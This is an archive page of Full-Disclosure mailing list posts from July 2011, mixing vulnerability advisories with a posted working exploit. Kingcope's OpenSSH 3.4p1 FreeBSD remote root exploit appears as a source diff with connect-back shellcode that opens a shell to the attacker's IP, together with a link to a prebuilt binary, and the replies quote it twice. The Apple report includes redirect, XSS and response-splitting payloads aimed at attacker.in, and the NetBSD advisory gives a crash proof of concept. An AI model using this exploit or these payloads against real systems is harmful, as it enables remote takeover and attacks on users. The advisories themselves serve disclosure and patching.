Re: [Full-disclosure] OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

2011-07-01 Thread Darren Tucker
This seems to be in libopie rather than sshd or libpam and happens
when the username is longer than OPIE_PRINCIPAL_MAX.  I'm not sure
exactly where inside libopie it is, but commenting out pam_opie.so
seems to prevent it.

http://www.freebsd.org/cgi/cvsweb.cgi/src/lib/libpam/modules/pam_opie/pam_opie.c?annotate=1.26
prevents usernames longer than OPIE_PRINCIPAL_MAX from being accepted
by pam_opie.

-- 
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4  37C9 C982 80C7 8FF4 FA69
    Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [Spanish] Curso gratuito: Linux exploit development - ASCII Armor Bypass Return-To-PLT

2011-07-01 Thread Pavel Carrillo
+1
  Iría pero soy de México y se me dificulta ir a argentina por una
platica, pero seria excelente que la grabaran y compartieran.

On 29/06/11 12:38, Jonas Andradas wrote:
 2011/6/29 runlvl run...@gmail.com mailto:run...@gmail.com
 
 Este sábado 2 de Julio a las 11:00hs se dictara en Castro Barros 183
 1-5 ( Argentina ) el curso de 3 horas gratuito sobre seguridad
 informática.
 
 
 El sábado me resultará imposible asistir. ¿Se va a grabar el curso para
 poder descargarlo posteriormente? ¿Se va colgar el material en algún sitio?
 
 Un saludo,
 
 -- 
 Jonás Andradas
 
 Skype: jontux
 LinkedIn: http://www.linkedin.com/in/andradas
 GPG Fingerprint:  678F 7BD0 83C3 28CE 9E8F
3F7F 4D87 9996 E0C6 9372
 Keyservers:  pgp.mit.edu http://pgp.mit.edu | pgp.rediris.es
 http://pgp.rediris.es
 
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
attachment: pavel_carrilloj.vcf___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SEC Consult SA-20110701-0 :: Multiple SQL injection vulnerabilities in WordPress

2011-07-01 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory  20110701-0 
===
  title: Multiple SQL Injection Vulnerabilities
product: WordPress
 vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions
  fixed version: 3.1.4/3.2-RC3
 impact: Medium
   homepage: http://wordpress.org/
  found: 2011-06-21
 by: K. Gudinavicius 
 SEC Consult Vulnerability Lab 
 https://www.sec-consult.com
===

Vendor description:
---
WordPress was born out of a desire for an elegant, well-architectured
personal publishing system built on PHP and MySQL and licensed under
the GPLv2 (or later). It is the official successor of b2/cafelog.
WordPress is fresh software, but its roots and development go back to
2001.

Source: http://wordpress.org/about/



Vulnerability overview/description:
---
Due to insufficient input validation in certain functions of WordPress
it is possible for a user with the Editor role to inject arbitrary
SQL commands. By exploiting this vulnerability, an attacker gains
access to all records stored in the database with the privileges of the
WordPress database user.



Proof of concept:
-
1) The get_terms() filter declared in the wp-includes/taxonomy.php file
does not properly validate user input,  allowing an attacker with
Editor privileges to inject arbitrary SQL commands in the orderby
and order parameters passed as array members to the vulnerable filter
when sorting for example link categories. 

The following URLs could be used to perform blind SQL injection
attacks: 

http://localhost/wp-admin/edit-tags.php?taxonomy=link_categoryorderby=[SQL
injection]order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=post_tagorderby=[SQL
injection]order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=categoryorderby=[SQL
injection]order=[SQL injection]


2) The get_bookmarks() function declared in the
wp-includes/bookmark.php file does not properly validate user input,
allowing an attacker with Editor privileges to inject arbitrary SQL
commands in the orderby and order parameters passed as array
members to the vulnerable function when sorting links. 

The following URL could be used to perform blind SQL injection attacks:

http://localhost/wp-admin/link-manager.php?orderby=[SQL
injection]order=[SQL injection]


Vulnerable / tested versions:
-
The vulnerability has been verified to exist in version 3.1.3 of
WordPress, which is the most recent version at the time of discovery.


Vendor contact timeline:

2011-06-22: Contacting vendor through secur...@wordpress.org
2011-06-22: Vendor reply, sending advisory draft
2011-06-23: Vendor confirms security issue
2011-06-30: Vendor releases patched version
2011-07-01: SEC Consult publishes advisory



Solution:
-
Upgrade to version 3.1.4 or 3.2-RC3


Workaround:
---
A more restrictive role, e.g. Author, could be applied to the user.



Advisory URL:
-
https://www.sec-consult.com/en/advisories.html


~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com

EOF K. Gudinavicius / @2011

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Vulnerabilities in developer.apple.com

2011-07-01 Thread YGN Ethical Hacker Group
Vulnerabilities via URL Redirector in developer.apple.com



1. VULNERABILITY DESCRIPTION

Arbitrary URL Redirect
==

POC (Browsers: All)
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in/malware_exists_in_this_page

Issue References:
OWASP Top 10 A10 -
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE 601 -  http://cwe.mitre.org/data/definitions/601.html


Cross Site Scripting(XSS) Via Arbitrary URL Redirect


POC (Browsers: Safari, Opera):
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQ3Jvc3MgU2l0ZSBTY3JpcHRpbmcgRGVtbyBieVxuXG55ZWhnLm5ldFxuIik8L3NjcmlwdD4%3D

Issue References:
OWASP Top 10 A2 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE 79 - http://cwe.mitre.org/data/definitions/79.html


HTTP Response Splitting(HRS) Via Arbitrary URL Redirect


https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in%0D%0ALocation%3A%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2089%0D%0A%0D%0A%3Chtml%3E%3Ctitle%3EThis%20page%20was%20hacked%3F%3C%2Ftitle%3E%3Ch1%3EThis%20page%20was%20hacked%3F%20-%20Not%20Really%3C%2Fh1%3E%3C!--

Issue References:
CWE 113 - http://cwe.mitre.org/data/definitions/113.html


Demo:
http://yehg.net/lab/pr0js/training/view/misc/Vulnerabilities%20Via%20Redirectors%20-%20developer.apple.com/


2. VENDOR

Apple Inc
http://www.apple.com


3. VULNERABILITY STATUS

FIXED


4. DISCLOSURE TIME-LINE

2011-04-25: reported vendor
2011-04-27: vendor replied Thank you for forwarding this issue to us.
We take any report of a potential security issue
very seriously.
2011-06-29: vendor replied vulnerability was fixed
2011-07-01: vulnerability was disclosed


5. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/developer.apple.com/[apple-developer]_ur_xss_hrs


#yehg [2011-07-01]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] NetBSD 5.1 libc/net multiple functions stack buffer overflow

2011-07-01 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ NetBSD 5.1 libc/net multiple functions stack buffer overflow ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/

Date:
- - Dis.: 01.04.2011
- - Pub.: 01.07.2011

CVE: CVE-2011-1656
CWE: CWE-121

Affected software:
- - NetBSD 5.1 (fixed)

Affected functions:
- - getservbyname(3)
- - getservbyname_r(3)
- - getservbyport(3)
- - getservbyport_r(3)
- - getaddrinfo(3)
- - getnameinfo(3)

Original URL:
http://securityreason.com/achievement_securityalert/99


- --- 0.Description ---
The getservbyname(), and getservbyport() functions each return a pointer
to an object with the following structure containing the broken-out
fields of a line in the network services data base,

 struct servent *
 getservbyname(const char *name, const char *proto);

 struct servent *
 getservbyport(int port, const char *proto);

The getservbyname() and getservbyport() functions sequentially search
from the beginning of the file until a matching protocol name or port
number is found, or until EOF is encountered.  If a protocol name is
also supplied (non-NULL), searches must also match the protocol.


- --- 1. NetBSD 5.1 libc/net multiple functions stack buffer overflow ---
The main problem exists in files like getservbyname_r.c and
getservbyport_r.c. Functions getservbyname*(3), getservbyport*(3) and
getaddrinfo(3) of NetBSD libc implementation, provides to possible
buffer overflow. To demonstrate this issue, we may use PHP as an attack
vector.

127# php -r 'getservbyname(A,str_repeat(A,7108));'
127# php -r 'getservbyname(A,str_repeat(A,7109));'
Memory fault (core dumped)

- -php-5.3.6/ext/standard/basic_functions.c---
PHP_FUNCTION(getservbyname)
{
char *name, *proto;
int name_len, proto_len;
struct servent *serv;

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, ss, name,
name_len, proto, proto_len) == FAILURE) {
return;
}
...
serv = getservbyname(name, proto);  CALL TO LIBC
- -php-5.3.6/ext/standard/basic_functions.c---

BT:
#0  0xbb8b2d65 in __log2 () from /usr/lib/libc.so.12
#1  0xbb8afa2e in __call_hash () from /usr/lib/libc.so.12
#2  0xbb8b0ebd in __hash_open () from /usr/lib/libc.so.12
#3  0xbb8884c2 in getservbyname_r () from /usr/lib/libc.so.12
#4  0xbb822f6f in getservbyname () from /usr/lib/libc.so.12
#5  0x08334458 in php_get_highlight_struct ()

Let's see what is wrong with getservbyname().

- -getservbyname.c---
struct servent *
getservbyname(const char *name, const char *proto)
{
struct servent *s;

mutex_lock(_servent_mutex);
s = getservbyname_r(name, proto, _servent_data.serv, _servent_data);
=== REFERENCE
mutex_unlock(_servent_mutex);
return (s);
}
- -getservbyname.c---

as we can see, getservbyname(3) redirect to getservbyname_r(3) function.

- -getservbyname_r.c---
if (sd-flags  _SV_DB) {
char buf[BUFSIZ];
DBT key, data;
DB *db = sd-db;
key.data = buf;

if (proto == NULL)
key.size = snprintf(buf, sizeof(buf), \376%s, name); 
= INVALID
key.size HERE
else
key.size = snprintf(buf, sizeof(buf), \376%s/%s, 
= INVALID
key.size HERE
name, proto);
key.size++;

if ((*db-get)(db, key, data, 0) != 0)
return NULL;

if ((*db-get)(db, data, key, 0) != 0)
return NULL;
- -getservbyname_r.c---

key.size may be bigger as BUFSIZ.

snprintf(3) return number of characters that would have been written had
size been sufficiently large (not counting the terminating null). In
this case, snprintf(3) return bigger value as sizeof(buf). In older libc
implementations, snprintf(3) should return -1, if the string is truncated.

The same problem is with getservbyport_r(3).

- -getservbyname_r.c---
if (sd-flags  _SV_DB) {
char buf[BUFSIZ];
DBT key, data;
DB *db = sd-db;
key.data = buf;

port = htons(port);
if (proto == NULL)
key.size = snprintf(buf, sizeof(buf), \377%d, port); 
= INVALID
key.size HERE
else
key.size = snprintf(buf, sizeof(buf), \377%d/%s, 
port, =
INVALID key.size HERE
proto);
key.size++;

if ((*db-get)(db, key, data, 0) != 0)
return NULL;

if ((*db-get)(db, data, key, 0) != 0)
return NULL;
- -getservbyname_r.c---

And the last PoC:
- -PoC---
/*
127# gcc -o grr grr.c  ./grr 6050
127# gcc -o grr grr.c  ./grr 6051
Memory fault (core dumped)
127#


*/
#include stdlib.h
#include string.h
#include 

Re: [Full-disclosure] S3cC0n Security Conference

2011-07-01 Thread s3cc0n Conference
S3cC0n Security Conference Schedule


http://dl.dropbox.com/u/18007092/S3cC0n_Schedule.pdf



On Wed, Jun 29, 2011 at 3:17 PM, secc0n Conference s3c...@gmail.com wrote:


 Dear Security researchers,
 S3cC0n, A Indian internet security researcher team invites you to join
 us on 7th, 8th, and 9th of July for the annual discloser of exploits and
 security researches. Last 2 year we are organizing this conference with 56
 researchers. S3cC0n is proud to announce the launch of it security and
 hacking conference at INDIA. This  conference will bring together security
 researchers , security professionals , vendors , Law enforcements agencies
 from all over the country to a common platform to discuss latest research in
 field of information security and in particular the major security threats
 faced by everyone today .
 S3cC0n is one of a kind of conference showcasing the latest research and
 trends in information security by renowned security
 researchers/professionals.
 Following topics are covered
 Web application – Security is not separate
 Cross interface attack (CIA)
 Web Trend – Exploited browser
 SQLXSS (SQL Injections XSS)
 Remote Code execution in Dev
 Document rendering attack
 XML authoring flow
 WAF Bypass Methods
 Web Widget interface flaw
 Persistent Redirection flaw
 Declarative security
 Content Delivery networks – Stringency
 Many More Private 0days will be disclosed in conference...
 Topic information with schedule of discussion topic and author name will
 display soon.

 For More details please shout mail [AT]  s3c...@gmail.com

 Best Regards,

 S3cC0n Team

 Download PDF :
 http://dl.dropbox.com/u/18007092/Dear_Security_researchers.pdf

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)

2011-07-01 Thread HI-TECH .
OpenSSH FreeBSD Remote Root Exploit
By Kingcope
Year 2011

Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z yourip target
setup a netcat, port 443 on yourip first

a statically linked linux binary of the exploit can be found below
attached is a diff to openssh-5.8p2.

the statically linked binary can be downloaded from
http://isowarez.de/ssh_0day

I know these versions are really old, some seem to run
that tough.

-Cheers, King the archaeologist Cope

diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
149a150
 char *myip;
195a197,203
 OpenSSH FreeBSD Remote Root Exploit\n
 By Kingcope\n
 Year 2011\n\n
 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n
 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n
 run like ./ssh -1 -z yourip target\n
 setup a netcat, port 443 on yourip first\n\n
299c307
   while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:p:qstvx
---
   while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:z:p:qstvx
335a344,346
   break;
   case 'z':
   myip = optarg;
diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,719
 //IP=\xc0\xa8\x20\x80
 #define   IPADDR  \xc0\xa8\x20\x80
 #define PORT  \x27\x10  /* htons(1) */

 char sc[] =
\x90\x90
\x90\x90
\x31\xc9 // xorecx, ecx
\xf7\xe1 // mulecx
\x51 // push   ecx
\x41 // incecx
\x51 // push   ecx
\x41 // incecx
\x51 // push   ecx
\x51 // push   ecx
\xb0\x61 // moval, 97
\xcd\x80 // int80h
\x89\xc3 // movebx, eax
\x68IPADDR   // push   dword 0101017fh
\x66\x68PORT // push   word 4135
\x66\x51 // push   cx
\x89\xe6 // movesi, esp
\xb2\x10 // movdl, 16
\x52 // push   edx
\x56 // push   esi
\x50 // push   eax
\x50 // push   eax
\xb0\x62 // moval, 98
\xcd\x80 // int80h
\x41 // incecx
\xb0\x5a // moval, 90
\x49 // dececx
\x51 // push   ecx
\x53 // push   ebx
\x53 // push   ebx
\xcd\x80 // int80h
\x41 // incecx
\xe2\xf5 // loop   -10
\x51 // push   ecx
\x68\x2f\x2f\x73\x68 // push   dword 68732f2fh
\x68\x2f\x62\x69\x6e // push   dword 6e69622fh
\x89\xe3 // movebx, esp
\x51 // push   ecx
\x54 // push   esp
\x53 // push   ebx
\x53 // push   ebx
\xb0\xc4\x34\xff
\xcd\x80;// int80h


 extern char *myip;

678a731,748

   char buffer[10];

   printf(OpenSSH Remote Root Exploit\n);
   printf(By Kingcope\n);
   printf(Year 2011\n\n);
   printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n);
   printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n);
   printf(Connect back to: %s:443\n, myip);

   *((unsigned long*)(sc + 21)) = inet_addr(myip);
   *((unsigned short*)(sc + 27)) = htons(443);

   memset(buffer, 'V', 8096);
   memcpy(buffer+24, \x6b\x4b\x0c\x08, 4); // SSH-1.99-OpenSSH_3.4p1 
 FreeBSD-20020702
   memset(buffer+28, '\x90', 65535);
   memcpy(buffer+28+65535, sc, sizeof(sc));
   server_user=buffer;

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)

2011-07-01 Thread HI-TECH .
you can apply the patch using the diff if you don't want to run that.

2011/7/1 Benji m...@b3nji.com:
 So you want people to download your statically linked binary?

 On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH .
 isowarez.isowarez.isowa...@googlemail.com wrote:

 OpenSSH FreeBSD Remote Root Exploit
 By Kingcope
 Year 2011

 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
 run like ./ssh -1 -z yourip target
 setup a netcat, port 443 on yourip first

 a statically linked linux binary of the exploit can be found below
 attached is a diff to openssh-5.8p2.

 the statically linked binary can be downloaded from
 http://isowarez.de/ssh_0day

 I know these versions are really old, some seem to run
 that tough.

 -Cheers, King the archaeologist Cope

 diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
 149a150
  char *myip;
 195a197,203
  OpenSSH FreeBSD Remote Root Exploit\n
  By Kingcope\n
  Year 2011\n\n
  Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n
  Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n
  run like ./ssh -1 -z yourip target\n
  setup a netcat, port 443 on yourip first\n\n
 299c307
        while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:p:qstvx
 ---
        while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:z:p:qstvx
 335a344,346
                        break;
                case 'z':
                        myip = optarg;
 diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
 667a668,719
  //IP=\xc0\xa8\x20\x80
  #define       IPADDR  \xc0\xa8\x20\x80
  #define PORT  \x27\x10              /* htons(1) */
 
  char sc[] =
     \x90\x90
     \x90\x90
     \x31\xc9                 // xor    ecx, ecx
     \xf7\xe1                 // mul    ecx
     \x51                     // push   ecx
     \x41                     // inc    ecx
     \x51                     // push   ecx
     \x41                     // inc    ecx
     \x51                     // push   ecx
     \x51                     // push   ecx
     \xb0\x61                 // mov    al, 97
     \xcd\x80                 // int    80h
     \x89\xc3                 // mov    ebx, eax
     \x68IPADDR                       // push   dword 0101017fh
     \x66\x68PORT             // push   word 4135
     \x66\x51                 // push   cx
     \x89\xe6                 // mov    esi, esp
     \xb2\x10                 // mov    dl, 16
     \x52                     // push   edx
     \x56                     // push   esi
     \x50                     // push   eax
     \x50                     // push   eax
     \xb0\x62                 // mov    al, 98
     \xcd\x80                 // int    80h
     \x41                     // inc    ecx
     \xb0\x5a                 // mov    al, 90
     \x49                     // dec    ecx
     \x51                     // push   ecx
     \x53                     // push   ebx
     \x53                     // push   ebx
     \xcd\x80                 // int    80h
     \x41                     // inc    ecx
     \xe2\xf5                 // loop   -10
     \x51                     // push   ecx
     \x68\x2f\x2f\x73\x68     // push   dword 68732f2fh
     \x68\x2f\x62\x69\x6e     // push   dword 6e69622fh
     \x89\xe3                 // mov    ebx, esp
     \x51                     // push   ecx
     \x54                     // push   esp
     \x53                     // push   ebx
     \x53                     // push   ebx
     \xb0\xc4\x34\xff
     \xcd\x80;                // int    80h
 
 
  extern char *myip;
 
 678a731,748
 
        char buffer[10];
 
        printf(OpenSSH Remote Root Exploit\n);
        printf(By Kingcope\n);
        printf(Year 2011\n\n);
        printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n);
        printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n);
        printf(Connect back to: %s:443\n, myip);
 
        *((unsigned long*)(sc + 21)) = inet_addr(myip);
        *((unsigned short*)(sc + 27)) = htons(443);
 
        memset(buffer, 'V', 8096);
        memcpy(buffer+24, \x6b\x4b\x0c\x08, 4); //
  SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
        memset(buffer+28, '\x90', 65535);
        memcpy(buffer+28+65535, sc, sizeof(sc));
        server_user=buffer;

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)

2011-07-01 Thread Benji
So you want people to download your statically linked binary?

On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH . 
isowarez.isowarez.isowa...@googlemail.com wrote:

 OpenSSH FreeBSD Remote Root Exploit
 By Kingcope
 Year 2011

 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
 run like ./ssh -1 -z yourip target
 setup a netcat, port 443 on yourip first

 a statically linked linux binary of the exploit can be found below
 attached is a diff to openssh-5.8p2.

 the statically linked binary can be downloaded from
 http://isowarez.de/ssh_0day

 I know these versions are really old, some seem to run
 that tough.

 -Cheers, King the archaeologist Cope

 diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
 149a150
  char *myip;
 195a197,203
  OpenSSH FreeBSD Remote Root Exploit\n
  By Kingcope\n
  Year 2011\n\n
  Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n
  Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n
  run like ./ssh -1 -z yourip target\n
  setup a netcat, port 443 on yourip first\n\n
 299c307
while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:p:qstvx
 ---
while ((opt = getopt(ac, av, 1246ab:c:e:fgi:kl:m:no:z:p:qstvx
 335a344,346
break;
case 'z':
myip = optarg;
 diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
 667a668,719
  //IP=\xc0\xa8\x20\x80
  #define   IPADDR  \xc0\xa8\x20\x80
  #define PORT  \x27\x10  /* htons(1) */
 
  char sc[] =
 \x90\x90
 \x90\x90
 \x31\xc9 // xorecx, ecx
 \xf7\xe1 // mulecx
 \x51 // push   ecx
 \x41 // incecx
 \x51 // push   ecx
 \x41 // incecx
 \x51 // push   ecx
 \x51 // push   ecx
 \xb0\x61 // moval, 97
 \xcd\x80 // int80h
 \x89\xc3 // movebx, eax
 \x68IPADDR   // push   dword 0101017fh
 \x66\x68PORT // push   word 4135
 \x66\x51 // push   cx
 \x89\xe6 // movesi, esp
 \xb2\x10 // movdl, 16
 \x52 // push   edx
 \x56 // push   esi
 \x50 // push   eax
 \x50 // push   eax
 \xb0\x62 // moval, 98
 \xcd\x80 // int80h
 \x41 // incecx
 \xb0\x5a // moval, 90
 \x49 // dececx
 \x51 // push   ecx
 \x53 // push   ebx
 \x53 // push   ebx
 \xcd\x80 // int80h
 \x41 // incecx
 \xe2\xf5 // loop   -10
 \x51 // push   ecx
 \x68\x2f\x2f\x73\x68 // push   dword 68732f2fh
 \x68\x2f\x62\x69\x6e // push   dword 6e69622fh
 \x89\xe3 // movebx, esp
 \x51 // push   ecx
 \x54 // push   esp
 \x53 // push   ebx
 \x53 // push   ebx
 \xb0\xc4\x34\xff
 \xcd\x80;// int80h
 
 
  extern char *myip;
 
 678a731,748
 
char buffer[10];
 
printf(OpenSSH Remote Root Exploit\n);
printf(By Kingcope\n);
printf(Year 2011\n\n);
printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n);
printf(Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n);
printf(Connect back to: %s:443\n, myip);
 
*((unsigned long*)(sc + 21)) = inet_addr(myip);
*((unsigned short*)(sc + 27)) = htons(443);
 
memset(buffer, 'V', 8096);
memcpy(buffer+24, \x6b\x4b\x0c\x08, 4); // SSH-1.99-OpenSSH_3.4p1
 FreeBSD-20020702
memset(buffer+28, '\x90', 65535);
memcpy(buffer+28+65535, sc, sizeof(sc));
server_user=buffer;

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-11-232: HP iNode Management Center iNodeMngChecker.exe Remote Code Execution Vulnerability

2011-07-01 Thread ZDI Disclosures
ZDI-11-232: HP iNode Management Center iNodeMngChecker.exe Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-232

July 1, 2011

-- CVE ID:
CVE-2011-1867

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Hewlett-Packard

-- Affected Products:
Hewlett-Packard  iNode Management Center

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11239. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of HP H3C/3Com iNode Management Center.
Authentication is not required to exploit this vulnerability. 

The flaw exists within the iNOdeMngChecker.exe component which listens
by default on TCP port 9090. When handling the 0x0A0BF007 packet type
the process blindly copies user supplied data into a fixed-length buffer
on the stack. A remote attacker can exploit this vulnerability to
execute arbitrary code under the context of the SYSTEM user.

-- Vendor Response:
Hewlett-Packard has issued an update to correct this vulnerability. More
details can be found at:

http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02901775

-- Disclosure Timeline:
2011-01-21 - Vulnerability reported to vendor
2011-07-01 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Luigi Auriemma

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 2267-1] perl security update

2011-07-01 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2267-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
July 01, 2011  http://www.debian.org/security/faq
- -

Package: perl
Vulnerability  : restriction bypass
Problem type   : local
Debian-specific: no
CVE ID : CVE-2010-1447 
Debian Bug : 631529

It was discovered that Perl's Safe module - a module to compile and 
execute code in restricted compartments - could by bypassed.

Please note that this update is known to break Petal, an XML-based 
templating engine (shipped with Debian 6.0/Squeeze in the package
libpetal-perl, see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=582805
for details). A fix is not yet available. If you use Petal, you might
consider to put the previous Perl packages on hold.

For the oldstable distribution (lenny), this problem has been fixed in
version 5.10.0-19lenny5.

For the stable distribution (squeeze), this problem has been fixed in
version 5.10.1-17squeeze2.

For the unstable distribution (sid), this problem has been fixed in
version 5.12.3-1.

We recommend that you upgrade your perl packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk4OCOMACgkQXm3vHE4uylpFjwCgxNO0AgBmr0EM17E3rbK4Yxfo
2/gAoIuX2QExRCbSywe476I8kyKsojEq
=Lcl2
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 2268-1] iceweasel security update

2011-07-01 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2268-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
July 01, 2011  http://www.debian.org/security/faq
- -

Package: iceweasel
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-0083 CVE-2011-0085 CVE-2011-2362 CVE-2011-2363 
 CVE-2011-2365 CVE-2011-2371 CVE-2011-2373 CVE-2011-2374 
 CVE-2011-2376 

Several vulnerabilities have been found in Iceweasel, a web browser
based on Firefox:

CVE-2011-0083 / CVE-2011-2363

   regenrecht discovered two use-after-frees in SVG processing, which
   could lead to the execution of arbitrary code.

CVE-2011-0085

   regenrecht discovered a use-after-free in XUL processing, which
   could lead to the execution of arbitrary code.

